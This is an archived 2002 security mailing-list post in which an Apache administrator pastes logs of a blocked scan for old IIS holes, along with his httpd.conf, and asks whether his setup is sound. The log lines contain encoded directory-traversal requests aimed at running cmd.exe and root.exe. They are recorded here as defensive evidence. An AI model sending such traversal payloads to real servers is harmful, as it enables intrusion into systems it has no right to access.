OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Marcel Weber (mmweber_at_ncpro.com)
Date: Sat Oct 05 2002 - 18:38:12 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi

    I had some bizarre 404 entries in my apache logs. They are very rare, but it
    looks as they resulted from an attempted attack. Well say it was a rather
    lame attack, but I wonder where the 404 and 400 came from. As the server is
    configured, there should be only 403 answers, as the whole http part is
    closed. Except for one directory and from the intranet. From the outside one
    can access the server via https only.

    I don't know if I have to be alerted or something, but I would feel better
    if someone could check my set up. Just for making sure, that it is not a
    misconfiguration. The server is an older Compaq Proliant 800, some Pentium
    133 MHz. Rather slow, perhaps this has an influence.

    Below are the error.log and access.log in question an at the end the
    relevant section of the httpd.conf.

    Regards

    Marcel

    ############################################################################
    ###
    access.log: I put some newlines between the 404 an the rest of it.

    80.240.96.146 - - [29/Sep/2002:12:50:03 +0200] "GET /scripts/root.exe?/c+dir
    HTT
    P/1.0" 403 286 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET /MSADC/root.exe?/c+dir
    HTTP/
    1.0" 403 284 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
    /c/winnt/system32/cmd.exe?/c
    +dir HTTP/1.0" 403 294 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:04 +0200] "GET
    /d/winnt/system32/cmd.exe?/c
    +dir HTTP/1.0" 403 294 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
    /scripts/..%255c../winnt/sys
    tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
    /_vti_bin/..%255c../..%255c.
    ./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:05 +0200] "GET
    /_mem_bin/..%255c../..%255c.
    ./..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 325 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
    /msadc/..%255c../..%255c../.
    .%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
    HTTP/1.0"
    403 341 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
    /scripts/..%c1%1c../winnt/sy
    stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"

    80.240.96.146 - - [29/Sep/2002:12:50:06 +0200] "GET
    /scripts/..%c0%2f../winnt/sy
    stem32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"

    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
    /scripts/..%c0%af../winnt/sy
    stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
    /scripts/..%c1%9c../winnt/sy
    stem32/cmd.exe?/c+dir HTTP/1.0" 403 307 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:07 +0200] "GET
    /scripts/..%%35%63../winnt/s
    ystem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
    /scripts/..%%35c../winnt/sys
    tem32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
    /scripts/..%25%35%63../winnt
    /system32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"
    80.240.96.146 - - [29/Sep/2002:12:50:08 +0200] "GET
    /scripts/..%252f../winnt/sys
    tem32/cmd.exe?/c+dir HTTP/1.0" 403 308 "-" "-"

    ###########################################################################
    In the error.log there are following entries:

    [Sun Sep 29 12:50:03 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/MSADC
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/c
    [Sun Sep 29 12:50:04 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/d
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/_vti_bin
    [Sun Sep 29 12:50:05 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/_mem_bin
    [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/msadc
    [Sun Sep 29 12:50:06 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:07 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts
    [Sun Sep 29 12:50:08 2002] [error] [client 80.240.96.146] client denied by
    serve
    r configuration: /var/www/scripts

    ####################################################################3

    Here comes my httpd.conf

    <Location />
           Order allow,deny
           deny from all
    </Location>

    <VirtualHost _default_:80>
            ServerName xxx.foo.com
            ServerAlias xxx.faa.com

    <Location />
          Order allow,deny
          allow from 192.x.x.0/24 # allow access only from the intranet

          AuthType Basic
          AuthName "foo"
          AuthLDAPBindDN "xxxxxxxxxxxxxxxxxxxxxxxx"
          AuthLDAPBindPassword "xxxxxxxxxxxxxxxxxxx"
          AuthLDAPUrl ldap://dddddddddddddddddddddddddddddddddddddd
          require valid-user

    </Location>

    <Location /public>
            Order allow,deny
            allow from all
            satisfy any
    </Location>

            <Location /zykadmin>
                    Order allow,deny
                    allow from 192.x.x.0/24
            </Location>

            <Location /servlets>
                    Order allow,deny
                    Allow from 192.x.x.0/24
            </Location>

            #### Servlets welche via http zugänglich sind
            WebAppDeploy examples warpConnection /servlets/examples/
            WebAppDeploy lagerchargen warpConnection /servlets/agauga/

    </VirtualHost>

    <VirtualHost _default_:443>
            DocumentRoot /var/www
            ServerName xxx.foo.com
            ServerAlias yyy.faa.com

            #### Servlets welche via https zugänglich sind
            WebAppDeploy examples warpConnection /servlets/examples/
            WebAppDeploy lagerchargen warpConnection /servlets/agauga/

            <Location />
                   Order allow,deny
                   allow from all

                    AuthType Basic
                    AuthName "iiiiiiiiiiiii"
                    AuthLDAPBindDN "ooooooooooooooooooo"
                    AuthLDAPBindPassword "xxxxxxxxxx"
                    AuthLDAPUrl ldap://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
                    require valid-user

            </Location>

            <IfModule mod_ssl.c>
                      SSLEngine on
                      SSLCertificateFile /etc/apache/ssl.crt/server.crt
                      SSLCertificateKeyFile /etc/apache/ssl.key/server.key
    # SetEnvIf User-Agent ".*MSIE.*" nokeepalive
    ssl-unclean-shutdown
            </IfModule>
    </VirtualHost>

    --------------------

    PGP / GPG Key: http://www.ncpro.com/GPG/mmweber-at-ncpro-com.asc 

    -- 
To UNSUBSCRIBE, email to debian-security-requestlists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmasterlists.debian.org